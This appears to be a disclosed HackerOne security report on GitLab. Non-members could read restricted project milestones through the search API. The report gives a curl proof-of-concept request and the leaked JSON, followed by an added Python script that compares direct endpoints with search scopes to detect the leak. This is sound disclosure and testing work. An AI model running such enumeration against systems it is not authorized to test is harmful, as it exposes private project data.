Milestones leaked via search API
HackerOne report #460815 by xanbanx on 2018-12-11:
GitLab allows restricting the project features of public projects. When all features of a public project are disabled for non-project members under https://gitlab.com/xanbanx/test-search/edit, full access to milestones is still possible via the search API.
Steps To Reproduce:
Reproduced on GitLab 11.6.0-rc4-ee
- Create a public project and disable all features for non-project members by setting all features under https://gitlab.com/xanbanx/test-search/edit to Only Project Members
- Create a new milestone, e.g., named milestone
- As a non-project member, perform the following API request (substitute the project id; the URL is quoted so the shell does not treat & as a command separator):
curl --request GET --header "PRIVATE-TOKEN: <YOUR-TOKEN>" "https://gitlab.example.com/api/v4/projects/<project-id>/search?search=milestone&scope=milestones"
Although the user does not have access to the project and is not a project member, the API returns:
[
{
"id": 123,
"iid": 1,
"project_id": 12,
"title": "milestone",
"description": "milestone",
"state": "active",
"created_at": "2018-12-11T20:03:25.381Z",
"updated_at": "2018-12-11T20:03:25.381Z",
"due_date": null,
"start_date": null,
"web_url": "https://gitlab.example.com/namespace/project/milestones/1"
}
]
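The check below is an added example, not code from the report or from GitLab: it turns the single curl request above into a script a tester can run as a non-member to compare each direct feature endpoint (which the "Only Project Members" setting is supposed to protect) with the corresponding search scope, and flags a scope as a leak when the direct endpoint is denied but the search still returns objects. Only the milestones scope is demonstrated in the report; the issues and merge_requests rows, the 401/403/404 set treated as "denied", and the fake_transport stand-in (which replays the report's milestone response offline) are this example's own assumptions.

```python
"""Compare GitLab direct feature endpoints with project search scopes as a
non-member. Added example for the report above; not GitLab's own code."""
import json
import urllib.error
import urllib.request
from urllib.parse import urlencode

# Assumed mapping from search scopes to the direct endpoint that the
# "Only Project Members" setting is meant to protect. The report shows only
# the milestones scope; the other rows extend the same check.
SCOPE_TO_ENDPOINT = {
    "milestones": "milestones",
    "issues": "issues",
    "merge_requests": "merge_requests",
}

# Statuses taken to mean the direct endpoint refused the caller (assumption).
DENIED_STATUSES = (401, 403, 404)


def http_get(url, token):
    """GET `url` with a PRIVATE-TOKEN header and return (status, body)."""
    req = urllib.request.Request(url, headers={"PRIVATE-TOKEN": token})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check_project(base_url, project_id, token, search_term, transport=http_get):
    """For each scope, query the direct endpoint and the search endpoint as
    the caller identified by `token`.

    Returns {scope: {"direct_status", "search_status", "search_hits", "verdict"}}.
    verdict is "leak" when the direct endpoint is denied but the search scope
    still returns objects, "ok" otherwise.
    """
    report = {}
    for scope, endpoint in SCOPE_TO_ENDPOINT.items():
        direct_status, _ = transport(
            f"{base_url}/api/v4/projects/{project_id}/{endpoint}", token)
        query = urlencode({"search": search_term, "scope": scope})
        search_status, search_body = transport(
            f"{base_url}/api/v4/projects/{project_id}/search?{query}", token)
        hits = []
        if search_status == 200:
            try:
                parsed = json.loads(search_body)
                hits = parsed if isinstance(parsed, list) else []
            except ValueError:
                hits = []
        denied = direct_status in DENIED_STATUSES
        report[scope] = {
            "direct_status": direct_status,
            "search_status": search_status,
            "search_hits": len(hits),
            "verdict": "leak" if denied and hits else "ok",
        }
    return report


# Constructed stand-in for an instance behaving as the report describes:
# direct feature endpoints refuse the non-member, while the milestones
# search scope still returns the milestone (values copied from the report).
REPORTED_MILESTONE = [{
    "id": 123, "iid": 1, "project_id": 12, "title": "milestone",
    "description": "milestone", "state": "active",
    "created_at": "2018-12-11T20:03:25.381Z",
    "updated_at": "2018-12-11T20:03:25.381Z",
    "due_date": None, "start_date": None,
    "web_url": "https://gitlab.example.com/namespace/project/milestones/1",
}]


def fake_transport(url, token):
    """Offline transport replaying the reported behaviour (constructed)."""
    if "/search?" in url:
        if "scope=milestones" in url:
            return 200, json.dumps(REPORTED_MILESTONE)
        return 200, "[]"
    return 404, json.dumps({"message": "404 Project Not Found"})


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 5:  # base_url project_id non_member_token search_term
        base, pid, tok, term = sys.argv[1:]
        result = check_project(base, pid, tok, term)
    else:  # no arguments: run against the constructed offline stand-in
        result = check_project("https://gitlab.example.com", 12,
                               "<non-member-token>", "milestone",
                               transport=fake_transport)
    for scope, row in result.items():
        print(f"{scope:15} direct={row['direct_status']} "
              f"search={row['search_status']} hits={row['search_hits']} "
              f"-> {row['verdict']}")
```

Run it with a real base URL, project id, a token belonging to a user who is not a project member, and a search term that matches an existing milestone; a "leak" verdict for a scope means the feature setting is enforced on the direct endpoint but not on that search scope, which is exactly the condition the report describes for milestones.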
Impact
By using the search API, any user with limited access can enumerate all milestones. Milestones can include critical information, e.g., related to upcoming security milestones, etc.
Security issue
Edited by Felipe Artur